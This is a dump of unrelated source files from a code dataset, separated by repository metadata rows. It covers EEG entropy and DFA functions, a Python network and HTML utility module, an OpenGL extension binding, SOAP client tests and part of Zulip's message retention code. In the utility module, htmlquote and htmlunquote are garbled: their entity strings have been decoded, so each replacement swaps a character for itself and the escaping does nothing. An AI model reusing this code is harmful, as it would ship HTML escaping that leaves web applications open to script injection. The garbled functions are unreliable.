Second, use scipy.linalg function svd to decompose the embedding matrix
M and obtain a list of singular values:
W = svd(M, compute_uv=0)
At last, normalize W:
W /= sum(W)
Parameters
----------
X
list
a time series. X will be used to build embedding matrix and compute
singular values if W or M is not provided.
Tau
integer
the lag or delay when building a embedding sequence. Tau will be used
to build embedding matrix and compute singular values if W or M is not
provided.
DE
integer
the embedding dimension to build an embedding matrix from a given
series. DE will be used to build embedding matrix and compute
singular values if W or M is not provided.
W
list or array
the set of singular values, i.e., the singular spectrum
Returns
-------
FI
integer
Fisher information
Notes
-----
To speed up, it is recommended to compute W before calling this function
because W may also be used by other functions whereas computing it here
again will slow down.
See Also
--------
embed_seq : embed a time series into a matrix
"""
if W is None:
M = embed_seq(X, Tau, DE)
W = svd(M, compute_uv = 0)
W /= sum(W)
FI = 0
for i in xrange(0, len(W) - 1): # from 1 to M
FI += ((W[i +1] - W[i]) ** 2) / (W[i])
return FI
def ap_entropy(X, M, R):
"""Computer approximate entropy (ApEN) of series X, specified by M and R.
Suppose given time series is X = [x(1), x(2), ... , x(N)]. We first build
embedding matrix Em, of dimension (N-M+1)-by-M, such that the i-th row of Em
is x(i),x(i+1), ... , x(i+M-1). Hence, the embedding lag and dimension are
1 and M-1 respectively. Such a matrix can be built by calling pyeeg function
as Em = embed_seq(X, 1, M). Then we build matrix Emp, whose only
difference with Em is that the length of each embedding sequence is M + 1
    Denote the i-th and j-th row of Em as Em[i] and Em[j]. Their k-th elements
are Em[i][k] and Em[j][k] respectively. The distance between Em[i] and Em[j]
is defined as 1) the maximum difference of their corresponding scalar
components, thus, max(Em[i]-Em[j]), or 2) Euclidean distance. We say two 1-D
vectors Em[i] and Em[j] *match* in *tolerance* R, if the distance between them
is no greater than R, thus, max(Em[i]-Em[j]) <= R. Mostly, the value of R is
defined as 20% - 30% of standard deviation of X.
Pick Em[i] as a template, for all j such that 0 < j < N - M + 1, we can
check whether Em[j] matches with Em[i]. Denote the number of Em[j],
which is in the range of Em[i], as k[i], which is the i-th element of the
vector k. The probability that a random row in Em matches Em[i] is
    \sum_1^{N-M+1} k[i] / (N - M + 1), thus sum(k)/ (N - M + 1),
denoted as Cm[i].
We repeat the same process on Emp and obtained Cmp[i], but here 0<i<N-M
since the length of each sequence in Emp is M + 1.
The probability that any two embedding sequences in Em match is then
sum(Cm)/ (N - M +1 ). We define Phi_m = sum(log(Cm)) / (N - M + 1) and
Phi_mp = sum(log(Cmp)) / (N - M ).
And the ApEn is defined as Phi_m - Phi_mp.
Notes
-----
#. Please be aware that self-match is also counted in ApEn.
#. This function now runs very slow. We are still trying to speed it up.
References
----------
    Costa M, Goldberger AL, Peng C-K, Multiscale entropy analysis of biological
signals, Physical Review E, 71:021906, 2005
See also
--------
samp_entropy: sample entropy of a time series
Notes
-----
Extremely slow implementation. Do NOT use if your dataset is not small.
"""
N = len(X)
Em = embed_seq(X, 1, M)
Emp = embed_seq(X, 1, M + 1) # try to only build Emp to save time
Cm, Cmp = zeros(N - M + 1), zeros(N - M)
# in case there is 0 after counting. Log(0) is undefined.
for i in xrange(0, N - M):
# print i
for j in xrange(i, N - M): # start from i, self-match counts in ApEn
# if max(abs(Em[i]-Em[j])) <= R:# compare N-M scalars in each subseq v 0.01b_r1
if in_range(Em[i], Em[j], R):
Cm[i] += 1 ### Xin Liu
Cm[j] += 1
if abs(Emp[i][-1] - Emp[j][-1]) <= R: # check last one
Cmp[i] += 1
Cmp[j] += 1
if in_range(Em[i], Em[N-M], R):
Cm[i] += 1
Cm[N-M] += 1
# try to count Cm[j] and Cmp[j] as well here
# if max(abs(Em[N-M]-Em[N-M])) <= R: # index from 0, so N-M+1 is N-M v 0.01b_r1
# if in_range(Em[i], Em[N - M], R): # for Cm, there is one more iteration than Cmp
# Cm[N - M] += 1 # cross-matches on Cm[N - M]
Cm[N - M] += 1 # Cm[N - M] self-matches
# import code;code.interact(local=locals())
Cm /= (N - M +1 )
Cmp /= ( N - M )
# import code;code.interact(local=locals())
Phi_m, Phi_mp = sum(log(Cm)), sum(log(Cmp))
Ap_En = (Phi_m - Phi_mp) / (N - M)
return Ap_En
def samp_entropy(X, M, R):
"""Computer sample entropy (SampEn) of series X, specified by M and R.
SampEn is very close to ApEn.
Suppose given time series is X = [x(1), x(2), ... , x(N)]. We first build
embedding matrix Em, of dimension (N-M+1)-by-M, such that the i-th row of Em
is x(i),x(i+1), ... , x(i+M-1). Hence, the embedding lag and dimension are
1 and M-1 respectively. Such a matrix can be built by calling pyeeg function
as Em = embed_seq(X, 1, M). Then we build matrix Emp, whose only
difference with Em is that the length of each embedding sequence is M + 1
    Denote the i-th and j-th row of Em as Em[i] and Em[j]. Their k-th elements
are Em[i][k] and Em[j][k] respectively. The distance between Em[i] and Em[j]
is defined as 1) the maximum difference of their corresponding scalar
components, thus, max(Em[i]-Em[j]), or 2) Euclidean distance. We say two 1-D
vectors Em[i] and Em[j] *match* in *tolerance* R, if the distance between them
is no greater than R, thus, max(Em[i]-Em[j]) <= R. Mostly, the value of R is
defined as 20% - 30% of standard deviation of X.
Pick Em[i] as a template, for all j such that 0 < j < N - M , we can
check whether Em[j] matches with Em[i]. Denote the number of Em[j],
which is in the range of Em[i], as k[i], which is the i-th element of the
vector k.
We repeat the same process on Emp and obtained Cmp[i], 0 < i < N - M.
The SampEn is defined as log(sum(Cm)/sum(Cmp))
References
----------
    Costa M, Goldberger AL, Peng C-K, Multiscale entropy analysis of biological
signals, Physical Review E, 71:021906, 2005
See also
--------
ap_entropy: approximate entropy of a time series
Notes
-----
Extremely slow computation. Do NOT use if your dataset is not small and you
are not patient enough.
"""
N = len(X)
Em = embed_seq(X, 1, M)
Emp = embed_seq(X, 1, M + 1)
Cm, Cmp = zeros(N - M - 1) + 1e-100, zeros(N - M - 1) + 1e-100
# in case there is 0 after counting. Log(0) is undefined.
for i in xrange(0, N - M):
for j in xrange(i + 1, N - M): # no self-match
# if max(abs(Em[i]-Em[j])) <= R: # v 0.01_b_r1
if in_range(Em[i], Em[j], R):
Cm[i] += 1
# if max(abs(Emp[i] - Emp[j])) <= R: # v 0.01_b_r1
if abs(Emp[i][-1] - Emp[j][-1]) <= R: # check last one
Cmp[i] += 1
Samp_En = log(sum(Cm)/sum(Cmp))
return Samp_En
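# Illustrative usage sketch (not part of the original module): sample entropy of
# a short white-noise series. M=2 and R=0.2*std(X) follow the 20%-30% of
# standard deviation rule quoted in the docstring; the series is kept short
# because this implementation is slow.
def _example_samp_entropy():
    from numpy.random import randn
    X = randn(200)
    return samp_entropy(X, 2, 0.2 * std(X))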
def dfa(X, Ave = None, L = None):
"""Compute Detrended Fluctuation Analysis from a time series X and length of
boxes L.
    The first step to compute DFA is to integrate the signal. Let the original series
    be X = [x(1), x(2), ..., x(N)].
    The integrated signal Y = [y(1), y(2), ..., y(N)] is obtained as follows
y(k) = \sum_{i=1}^{k}{x(i)-Ave} where Ave is the mean of X.
The second step is to partition/slice/segment the integrated sequence Y into
boxes. At least two boxes are needed for computing DFA. Box sizes are
specified by the L argument of this function. By default, it is from 1/5 of
signal length to one (x-5)-th of the signal length, where x is the nearest
power of 2 from the length of the signal, i.e., 1/16, 1/32, 1/64, 1/128, ...
In each box, a linear least square fitting is employed on data in the box.
Denote the series on fitted line as Yn. Its k-th elements, yn(k),
corresponds to y(k).
For fitting in each box, there is a residue, the sum of squares of all
offsets, difference between actual points and points on fitted line.
F(n) denotes the square root of average total residue in all boxes when box
length is n, thus
    Total_Residue = \sum_{k=1}^{N}{(y(k)-yn(k))^2}
F(n) = \sqrt(Total_Residue/N)
The computing to F(n) is carried out for every box length n. Therefore, a
relationship between n and F(n) can be obtained. In general, F(n) increases
when n increases.
Finally, the relationship between F(n) and n is analyzed. A least square
fitting is performed between log(F(n)) and log(n). The slope of the fitting
line is the DFA value, denoted as Alpha. To white noise, Alpha should be
0.5. Higher level of signal complexity is related to higher Alpha.
Parameters
----------
X:
1-D Python list or numpy array
a time series
Ave:
integer, optional
The average value of the time series
L:
1-D Python list of integers
A list of box size, integers in ascending order
Returns
-------
Alpha:
integer
the result of DFA analysis, thus the slope of fitting line of log(F(n))
vs. log(n). where n is the
Examples
--------
>>> import pyeeg
>>> from numpy.random import randn
>>> print pyeeg.dfa(randn(4096))
0.490035110345
Reference
---------
Peng C-K, Havlin S, Stanley HE, Goldberger AL. Quantification of scaling
exponents and crossover phenomena in nonstationary heartbeat time series.
_Chaos_ 1995;5:82-87
Notes
-----
This value depends on the box sizes very much. When the input is a white
noise, this value should be 0.5. But, some choices on box sizes can lead to
the value lower or higher than 0.5, e.g. 0.38 or 0.58.
Based on many test, I set the box sizes from 1/5 of signal length to one
(x-5)-th of the signal length, where x is the nearest power of 2 from the
length of the signal, i.e., 1/16, 1/32, 1/64, 1/128, ...
You may generate a list of box sizes and pass in such a list as a parameter.
"""
X = array(X)
if Ave is None:
Ave = mean(X)
Y = cumsum(X)
Y -= Ave
if L is None:
L = floor(len(X)*1/(2**array(range(4,int(log2(len(X)))-4))))
F = zeros(len(L)) # F(n) of different given box length n
for i in xrange(0,len(L)):
n = int(L[i]) # for each box length L[i]
if n==0:
print "time series is too short while the box length is too big"
print "abort"
exit()
for j in xrange(0,len(X),n): # for each box
if j+n < len(X):
c = range(j,j+n)
c = vstack([c, ones(n)]).T # coordinates of time in the box
y = Y[j:j+n] # the value of data in the box
F[i] += lstsq(c,y)[1] # add residue in this box
F[i] /= ((len(X)/n)*n)
F = sqrt(F)
Alpha = lstsq(vstack([log(L), ones(len(L))]).T,log(F))[0][0]
return Alpha
| mit | -8,827,911,797,043,813,000 | 25.753488 | 88 | 0.63717 | false |
dahebolangkuan/ToughRADIUS | console/libs/pyforms/net.py | 11 | 4922 | #!/usr/bin/env python
#coding:utf-8
__all__ = [
"validipaddr", "validipport", "validip", "validaddr",
"urlquote",
"httpdate", "parsehttpdate",
"htmlquote", "htmlunquote", "websafe",
]
import urllib, time
try: import datetime
except ImportError: pass
def validipaddr(address):
"""
Returns True if `address` is a valid IPv4 address.
>>> validipaddr('192.168.1.1')
True
>>> validipaddr('192.168.1.800')
False
>>> validipaddr('192.168.1')
False
"""
try:
octets = address.split('.')
if len(octets) != 4:
return False
for x in octets:
if not (0 <= int(x) <= 255):
return False
except ValueError:
return False
return True
def validipport(port):
"""
Returns True if `port` is a valid IPv4 port.
>>> validipport('9000')
True
>>> validipport('foo')
False
>>> validipport('1000000')
False
"""
try:
if not (0 <= int(port) <= 65535):
return False
except ValueError:
return False
return True
def validip(ip, defaultaddr="0.0.0.0", defaultport=8080):
"""Returns `(ip_address, port)` from string `ip_addr_port`"""
addr = defaultaddr
port = defaultport
ip = ip.split(":", 1)
if len(ip) == 1:
if not ip[0]:
pass
elif validipaddr(ip[0]):
addr = ip[0]
elif validipport(ip[0]):
port = int(ip[0])
else:
raise ValueError, ':'.join(ip) + ' is not a valid IP address/port'
elif len(ip) == 2:
addr, port = ip
        if not (validipaddr(addr) and validipport(port)):
raise ValueError, ':'.join(ip) + ' is not a valid IP address/port'
port = int(port)
else:
raise ValueError, ':'.join(ip) + ' is not a valid IP address/port'
return (addr, port)
def validaddr(string_):
"""
Returns either (ip_address, port) or "/path/to/socket" from string_
>>> validaddr('/path/to/socket')
'/path/to/socket'
>>> validaddr('8000')
('0.0.0.0', 8000)
>>> validaddr('127.0.0.1')
('127.0.0.1', 8080)
>>> validaddr('127.0.0.1:8000')
('127.0.0.1', 8000)
>>> validaddr('fff')
Traceback (most recent call last):
...
ValueError: fff is not a valid IP address/port
"""
if '/' in string_:
return string_
else:
return validip(string_)
def urlquote(val):
"""
Quotes a string for use in a URL.
>>> urlquote('://?f=1&j=1')
'%3A//%3Ff%3D1%26j%3D1'
>>> urlquote(None)
''
>>> urlquote(u'\u203d')
'%E2%80%BD'
"""
if val is None: return ''
if not isinstance(val, unicode): val = str(val)
else: val = val.encode('utf-8')
return urllib.quote(val)
def httpdate(date_obj):
"""
Formats a datetime object for use in HTTP headers.
>>> import datetime
>>> httpdate(datetime.datetime(1970, 1, 1, 1, 1, 1))
'Thu, 01 Jan 1970 01:01:01 GMT'
"""
return date_obj.strftime("%a, %d %b %Y %H:%M:%S GMT")
def parsehttpdate(string_):
"""
Parses an HTTP date into a datetime object.
>>> parsehttpdate('Thu, 01 Jan 1970 01:01:01 GMT')
datetime.datetime(1970, 1, 1, 1, 1, 1)
"""
try:
t = time.strptime(string_, "%a, %d %b %Y %H:%M:%S %Z")
except ValueError:
return None
return datetime.datetime(*t[:6])
def htmlquote(text):
r"""
Encodes `text` for raw use in HTML.
>>> htmlquote(u"<'&\">")
u'<'&">'
"""
text = text.replace(u"&", u"&") # Must be done first!
text = text.replace(u"<", u"<")
text = text.replace(u">", u">")
text = text.replace(u"'", u"'")
text = text.replace(u'"', u""")
return text
def htmlunquote(text):
r"""
Decodes `text` that's HTML quoted.
>>> htmlunquote(u'<'&">')
u'<\'&">'
"""
text = text.replace(u""", u'"')
text = text.replace(u"'", u"'")
text = text.replace(u">", u">")
text = text.replace(u"<", u"<")
text = text.replace(u"&", u"&") # Must be done last!
return text
def websafe(val):
r"""Converts `val` so that it is safe for use in Unicode HTML.
>>> websafe("<'&\">")
u'<'&">'
>>> websafe(None)
u''
>>> websafe(u'\u203d')
u'\u203d'
>>> websafe('\xe2\x80\xbd')
u'\u203d'
"""
if val is None:
return u''
elif isinstance(val, str):
val = val.decode('utf-8')
elif not isinstance(val, unicode):
val = unicode(val)
return htmlquote(val)
if __name__ == "__main__":
import doctest
doctest.testmod()
| bsd-2-clause | -5,806,683,970,622,282,000 | 24.905263 | 78 | 0.514019 | false |
Eureka22/ASM_xf | PythonD/site_python/OpenGL/GL/SGIX/clipmap.py | 2 | 1173 | import string
__version__ = string.split('$Revision: 1.5 $')[1]
__date__ = string.join(string.split('$Date: 2001/07/20 23:53:31 $')[1:3], ' ')
__author__ = 'Tarn Weisner Burton <[email protected]>'
__doc__ = 'http://oss.sgi.com/projects/ogl-sample/registry/SGIX/clipmap.txt'
__api_version__ = 0x109
GL_LINEAR_CLIPMAP_LINEAR_SGIX = 0x8170
GL_TEXTURE_CLIPMAP_CENTER_SGIX = 0x8171
GL_TEXTURE_CLIPMAP_FRAME_SGIX = 0x8172
GL_TEXTURE_CLIPMAP_OFFSET_SGIX = 0x8173
GL_TEXTURE_CLIPMAP_VIRTUAL_DEPTH_SGIX = 0x8174
GL_TEXTURE_CLIPMAP_LOD_OFFSET_SGIX = 0x8175
GL_TEXTURE_CLIPMAP_DEPTH_SGIX = 0x8176
GL_MAX_CLIPMAP_DEPTH_SGIX = 0x8177
GL_MAX_CLIPMAP_VIRTUAL_DEPTH_SGIX = 0x8178
GL_NEAREST_CLIPMAP_NEAREST_SGIX = 0x844D
GL_NEAREST_CLIPMAP_LINEAR_SGIX = 0x844E
GL_LINEAR_CLIPMAP_NEAREST_SGIX = 0x844F
def glInitClipmapSGIX():
from OpenGL.GL import __has_extension
return __has_extension("GL_SGIX_clipmap")
def __info():
if glInitClipmapSGIX():
        return [('GL_MAX_CLIPMAP_DEPTH_SGIX', GL_MAX_CLIPMAP_DEPTH_SGIX, 'i'),
                ('GL_MAX_CLIPMAP_VIRTUAL_DEPTH_SGIX', GL_MAX_CLIPMAP_VIRTUAL_DEPTH_SGIX, 'i')]
| gpl-2.0 | 681,592,344,489,812,600 | 38.448276 | 88 | 0.68798 | false |
marceltschoppch/osa | tests/test_client.py | 2 | 2731 | #!/usr/bin/env python
# test_client.py - test Client class, part of osa.
# Copyright 2013 Sergey Bozhenkov, boz at ipp.mpg.de
# Licensed under LGPLv3 or later, see the COPYING file.
import os
import sys
sys.path.insert(0, "../")
from osa.client import Client
from osa.wsdl import *
from osa.method import *
from osa.xmltypes import *
from tests.base import BaseTest
import unittest
if sys.version_info[0] < 3:
from urllib2 import urlopen, HTTPError, URLError
else:
from urllib.request import urlopen, HTTPError, URLError
basestring = str
wsdl_url = 'http://lxpowerboz:88/services/python/HelloWorldService?wsdl'
test_path = os.path.abspath(os.path.dirname(__file__))
class TestClient(BaseTest):
def setUp(self):
self.client = Client(self.test_files['test.wsdl'])
def tearDown(self):
self.client = None
def test_init(self):
self.assertEqual(self.client.names, ["service HelloWorldService"])
for t in ("Person", "Name", "echoString", "sayHello"):
self.assertTrue(hasattr(self.client.types, t))
self.assertEqual(type(getattr(self.client.types, t)), ComplexTypeMeta)
for method in ("testMe", "giveMessage", "echoString", "sayHello", "faultyThing"):
self.assertTrue(hasattr(self.client.service, method))
self.assertEqual(type(getattr(self.client.service, method)), Method)
def test_giveMessage(self):
try:
urlopen("http://lxpowerboz:88")
except HTTPError:
pass
except URLError:
return
res = self.client.service.giveMessage()
self.assertTrue(isinstance(res, basestring))
def test_echoString(self):
try:
urlopen("http://lxpowerboz:88")
except HTTPError:
pass
except URLError:
return
self.assertEqual('my message 1', self.client.service.echoString('my message 1'))
def test_sayHello(self):
try:
urlopen("http://lxpowerboz:88")
except HTTPError:
pass
except URLError:
return
n = self.client.types.Name()
n.firstName = "first"
n.lastName = "last"
p = self.client.types.Person()
p.name = n
p.age = 30
p.weight = 80
p.height = 175
self.assertEqual(['Hello, first\n']*5, self.client.service.sayHello(p, 5))
def test_faultyThing(self):
try:
urlopen("http://lxpowerboz:88")
except HTTPError:
pass
except URLError:
return
try:
self.client.service.faultyThing()
except RuntimeError as e:
self.assertFalse(str(e).find('4u!') == -1)
| lgpl-3.0 | -5,961,999,119,692,928,000 | 29.010989 | 89 | 0.611131 | false |
showell/zulip | zerver/lib/retention.py | 4 | 26568 | # Core implementation of message retention policies and low-level
# helpers for deleting messages.
#
# Because bugs in code that deletes message content can cause
# irreversible harm in installations without backups, this is a
# particularly sensitive system that requires careful design,
# thoughtful database transaction boundaries, and a well-written test
# suite to make bugs unlikely and mitigate their impact.
#
# The core design principle of this system is we never delete a live
# Message/Reaction/etc. object. Instead, we use move_rows, which moves
# objects to a "deleted objects" table like ArchiveMessage, recording
# the change using a structure linked to an ArchiveTransaction object
# that can be used to undo that deletion transaction in a clean
# fashion.
#
# We move all of the data associated with a given block of messages in
# a single database transaction in order to avoid broken intermediate
# states where, for example, a message's reactions were deleted but
# not the messages themselves.
#
# And then a separate process deletes ArchiveTransaction objects
# ARCHIVED_DATA_VACUUMING_DELAY_DAYS after they were created.
#
# Because of the nice properties of this deletion system, we use the
# same system for routine deletions via the Zulip UI (deleting a
# message or group of messages) as we use for message retention policy
# deletions.
import logging
import time
from datetime import timedelta
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from django.conf import settings
from django.db import connection, transaction
from django.db.models import Model
from django.utils.timezone import now as timezone_now
from psycopg2.sql import SQL, Composable, Identifier, Literal
from zerver.lib.logging_util import log_to_file
from zerver.lib.request import RequestVariableConversionError
from zerver.models import (
ArchivedAttachment,
ArchivedReaction,
ArchivedSubMessage,
ArchivedUserMessage,
ArchiveTransaction,
Attachment,
Message,
Reaction,
Realm,
Recipient,
Stream,
SubMessage,
UserMessage,
get_user_including_cross_realm,
)
logger = logging.getLogger('zulip.retention')
log_to_file(logger, settings.RETENTION_LOG_PATH)
MESSAGE_BATCH_SIZE = 1000
STREAM_MESSAGE_BATCH_SIZE = 100
TRANSACTION_DELETION_BATCH_SIZE = 100
# This data structure declares the details of all database tables that
# hang off the Message table (with a foreign key to Message being part
# of its primary lookup key). This structure allows us to share the
# code for managing these related tables.
models_with_message_key: List[Dict[str, Any]] = [
{
'class': Reaction,
'archive_class': ArchivedReaction,
'table_name': 'zerver_reaction',
'archive_table_name': 'zerver_archivedreaction',
},
{
'class': SubMessage,
'archive_class': ArchivedSubMessage,
'table_name': 'zerver_submessage',
'archive_table_name': 'zerver_archivedsubmessage',
},
{
'class': UserMessage,
'archive_class': ArchivedUserMessage,
'table_name': 'zerver_usermessage',
'archive_table_name': 'zerver_archivedusermessage',
},
]
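# Illustrative sketch (not part of the original module): the archiving helpers
# below iterate over models_with_message_key to pair each live table with its
# archive table when building the per-table INSERT ... SELECT statements. This
# helper only demonstrates the shape of that iteration; the real query
# construction happens in move_related_objects_to_archive and its callees.
def _example_related_table_pairs() -> List[Tuple[str, str]]:
    return [
        (model['table_name'], model['archive_table_name'])
        for model in models_with_message_key
    ]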
@transaction.atomic(savepoint=False)
def move_rows(
base_model: Model,
raw_query: Composable,
*,
src_db_table: Optional[str]=None,
returning_id: bool=False,
**kwargs: Composable,
) -> List[int]:
"""Core helper for bulk moving rows between a table and its archive table"""
if src_db_table is None:
# Use base_model's db_table unless otherwise specified.
src_db_table = base_model._meta.db_table
src_fields = [
Identifier(src_db_table, field.column)
for field in base_model._meta.fields
]
dst_fields = [Identifier(field.column) for field in base_model._meta.fields]
sql_args = {
'src_fields': SQL(',').join(src_fields),
'dst_fields': SQL(',').join(dst_fields),
}
sql_args.update(kwargs)
with connection.cursor() as cursor:
cursor.execute(
raw_query.format(**sql_args),
)
if returning_id:
return [id for (id,) in cursor.fetchall()] # return list of row ids
else:
return []
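# Illustrative sketch of how move_rows is meant to be called (a hypothetical
# helper, not used anywhere in this module): the {src_fields}/{dst_fields}
# placeholders are filled in by move_rows itself, while every other placeholder
# has to be supplied as a keyword argument wrapped in Literal or Identifier.
def _example_archive_reactions(message_ids: List[int]) -> None:
    query = SQL("""
        INSERT INTO zerver_archivedreaction ({dst_fields})
        SELECT {src_fields}
        FROM zerver_reaction
        WHERE zerver_reaction.message_id IN {message_ids}
        ON CONFLICT (id) DO NOTHING
    """)
    move_rows(Reaction, query, message_ids=Literal(tuple(message_ids)))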
def run_archiving_in_chunks(
query: Composable,
type: int,
realm: Optional[Realm]=None,
chunk_size: int=MESSAGE_BATCH_SIZE,
**kwargs: Composable,
) -> int:
# This function is carefully designed to achieve our
# transactionality goals: A batch of messages is either fully
# archived-and-deleted or not transactionally.
#
# We implement this design by executing queries that archive messages and their related objects
# (such as UserMessage, Reaction, and Attachment) inside the same transaction.atomic() block.
assert type in (ArchiveTransaction.MANUAL, ArchiveTransaction.RETENTION_POLICY_BASED)
message_count = 0
while True:
start_time = time.time()
with transaction.atomic():
archive_transaction = ArchiveTransaction.objects.create(type=type, realm=realm)
new_chunk = move_rows(
Message,
query,
chunk_size=Literal(chunk_size),
returning_id=Literal(True),
archive_transaction_id=Literal(archive_transaction.id),
**kwargs,
)
if new_chunk:
move_related_objects_to_archive(new_chunk)
delete_messages(new_chunk)
message_count += len(new_chunk)
else:
archive_transaction.delete() # Nothing was archived
total_time = time.time() - start_time
# This line needs to be outside of the atomic block, to capture the actual moment
# archiving of the chunk is finished (since Django does some significant additional work
# when leaving the block).
if len(new_chunk) > 0:
logger.info("Archived %s messages in %.2fs in transaction %s.",
len(new_chunk), total_time, archive_transaction.id)
        # We run the loop until the query returns fewer results than chunk_size,
# which means we are done:
if len(new_chunk) < chunk_size:
break
return message_count
# Note about batching these Message archiving queries:
# We can simply use LIMIT without worrying about OFFSETs and ordering
# while executing batches, because any Message already archived (in the previous batch)
# will not show up in the "SELECT ... FROM zerver_message ..." query for the next batches.
def move_expired_messages_to_archive_by_recipient(recipient: Recipient,
message_retention_days: int, realm: Realm,
chunk_size: int=MESSAGE_BATCH_SIZE) -> int:
assert message_retention_days != -1
# This function will archive appropriate messages and their related objects.
query = SQL("""
INSERT INTO zerver_archivedmessage ({dst_fields}, archive_transaction_id)
SELECT {src_fields}, {archive_transaction_id}
FROM zerver_message
WHERE zerver_message.recipient_id = {recipient_id}
AND zerver_message.date_sent < {check_date}
LIMIT {chunk_size}
ON CONFLICT (id) DO UPDATE SET archive_transaction_id = {archive_transaction_id}
RETURNING id
""")
check_date = timezone_now() - timedelta(days=message_retention_days)
return run_archiving_in_chunks(
query,
type=ArchiveTransaction.RETENTION_POLICY_BASED,
realm=realm,
recipient_id=Literal(recipient.id),
check_date=Literal(check_date.isoformat()),
chunk_size=chunk_size,
)
def move_expired_personal_and_huddle_messages_to_archive(realm: Realm,
chunk_size: int=MESSAGE_BATCH_SIZE,
) -> int:
message_retention_days = realm.message_retention_days
assert message_retention_days != -1
check_date = timezone_now() - timedelta(days=message_retention_days)
# This function will archive appropriate messages and their related objects.
cross_realm_bot_ids = [
get_user_including_cross_realm(email).id
for email in settings.CROSS_REALM_BOT_EMAILS
]
recipient_types = (Recipient.PERSONAL, Recipient.HUDDLE)
# Archive expired personal and huddle Messages in the realm, except cross-realm messages.
    # The condition zerver_userprofile.realm_id = {realm_id} ensures the row won't be
# a message sent by a cross-realm bot, because cross-realm bots have their own separate realm.
query = SQL("""
INSERT INTO zerver_archivedmessage ({dst_fields}, archive_transaction_id)
SELECT {src_fields}, {archive_transaction_id}
FROM zerver_message
INNER JOIN zerver_recipient ON zerver_recipient.id = zerver_message.recipient_id
INNER JOIN zerver_userprofile ON zerver_userprofile.id = zerver_message.sender_id
WHERE zerver_userprofile.realm_id = {realm_id}
AND zerver_recipient.type in {recipient_types}
AND zerver_message.date_sent < {check_date}
LIMIT {chunk_size}
ON CONFLICT (id) DO UPDATE SET archive_transaction_id = {archive_transaction_id}
RETURNING id
""")
message_count = run_archiving_in_chunks(
query,
type=ArchiveTransaction.RETENTION_POLICY_BASED,
realm=realm,
cross_realm_bot_ids=Literal(tuple(cross_realm_bot_ids)),
realm_id=Literal(realm.id),
recipient_types=Literal(recipient_types),
check_date=Literal(check_date.isoformat()),
chunk_size=chunk_size,
)
# Archive cross-realm personal messages to users in the realm. We
# don't archive cross-realm huddle messages via retention policy,
# as we don't support them as a feature in Zulip, and the query to
# find and delete them would be a lot of complexity and potential
# performance work for a case that doesn't actually happen.
query = SQL("""
INSERT INTO zerver_archivedmessage ({dst_fields}, archive_transaction_id)
SELECT {src_fields}, {archive_transaction_id}
FROM zerver_message
INNER JOIN zerver_recipient ON zerver_recipient.id = zerver_message.recipient_id
INNER JOIN zerver_userprofile recipient_profile ON recipient_profile.id = zerver_recipient.type_id
INNER JOIN zerver_userprofile sender_profile ON sender_profile.id = zerver_message.sender_id
WHERE sender_profile.id IN {cross_realm_bot_ids}
AND recipient_profile.realm_id = {realm_id}
AND zerver_recipient.type = {recipient_personal}
AND zerver_message.date_sent < {check_date}
LIMIT {chunk_size}
ON CONFLICT (id) DO UPDATE SET archive_transaction_id = {archive_transaction_id}
RETURNING id
""")
message_count += run_archiving_in_chunks(
query,
type=ArchiveTransaction.RETENTION_POLICY_BASED,
realm=realm,
cross_realm_bot_ids=Literal(tuple(cross_realm_bot_ids)),
realm_id=Literal(realm.id),
recipient_personal=Literal(Recipient.PERSONAL),
check_date=Literal(check_date.isoformat()),
chunk_size=chunk_size,
)
return message_count
def move_models_with_message_key_to_archive(msg_ids: List[int]) -> None:
assert len(msg_ids) > 0
for model in models_with_message_key:
query = SQL("""
INSERT INTO {archive_table_name} ({dst_fields})
SELECT {src_fields}
FROM {table_name}
WHERE {table_name}.message_id IN {message_ids}
ON CONFLICT (id) DO NOTHING
""")
move_rows(
model['class'],
query,
table_name=Identifier(model['table_name']),
archive_table_name=Identifier(model['archive_table_name']),
message_ids=Literal(tuple(msg_ids)),
)
# Attachments can't use the common models_with_message_key system,
# because they can be referenced by more than one Message, and we only
# want to delete the Attachment if we're deleting the last message
# referencing them.
def move_attachments_to_archive(msg_ids: List[int]) -> None:
assert len(msg_ids) > 0
query = SQL("""
INSERT INTO zerver_archivedattachment ({dst_fields})
SELECT {src_fields}
FROM zerver_attachment
INNER JOIN zerver_attachment_messages
ON zerver_attachment_messages.attachment_id = zerver_attachment.id
WHERE zerver_attachment_messages.message_id IN {message_ids}
GROUP BY zerver_attachment.id
ON CONFLICT (id) DO NOTHING
""")
move_rows(Attachment, query, message_ids=Literal(tuple(msg_ids)))
def move_attachment_messages_to_archive(msg_ids: List[int]) -> None:
assert len(msg_ids) > 0
query = SQL("""
INSERT INTO zerver_archivedattachment_messages (id, archivedattachment_id, archivedmessage_id)
SELECT zerver_attachment_messages.id, zerver_attachment_messages.attachment_id,
zerver_attachment_messages.message_id
FROM zerver_attachment_messages
WHERE zerver_attachment_messages.message_id IN %(message_ids)s
ON CONFLICT (id) DO NOTHING
""")
with connection.cursor() as cursor:
cursor.execute(query, dict(message_ids=tuple(msg_ids)))
def delete_messages(msg_ids: List[int]) -> None:
# Important note: This also deletes related objects with a foreign
# key to Message (due to `on_delete=CASCADE` in our models
# configuration), so we need to be sure we've taken care of
# archiving the messages before doing this step.
Message.objects.filter(id__in=msg_ids).delete()
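# Illustrative note: the safe ordering, as used by run_archiving_in_chunks()
# above, is always "archive first, delete second" inside a single transaction,
# e.g.
#
#   with transaction.atomic():
#       move_related_objects_to_archive(msg_ids)
#       delete_messages(msg_ids)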
def delete_expired_attachments(realm: Realm) -> None:
attachments_deleted, _ = Attachment.objects.filter(
messages__isnull=True,
realm_id=realm.id,
id__in=ArchivedAttachment.objects.filter(realm_id=realm.id),
).delete()
if attachments_deleted > 0:
logger.info("Cleaned up %s attachments for realm %s", attachments_deleted, realm.string_id)
def move_related_objects_to_archive(msg_ids: List[int]) -> None:
move_models_with_message_key_to_archive(msg_ids)
move_attachments_to_archive(msg_ids)
move_attachment_messages_to_archive(msg_ids)
def archive_messages_by_recipient(recipient: Recipient, message_retention_days: int,
realm: Realm, chunk_size: int=MESSAGE_BATCH_SIZE) -> int:
return move_expired_messages_to_archive_by_recipient(recipient, message_retention_days,
realm, chunk_size)
def archive_personal_and_huddle_messages(realm: Realm, chunk_size: int=MESSAGE_BATCH_SIZE) -> None:
logger.info("Archiving personal and huddle messages for realm %s", realm.string_id)
message_count = move_expired_personal_and_huddle_messages_to_archive(realm, chunk_size)
logger.info("Done. Archived %s messages", message_count)
def archive_stream_messages(realm: Realm, streams: List[Stream], chunk_size: int=STREAM_MESSAGE_BATCH_SIZE) -> None:
if not streams:
return
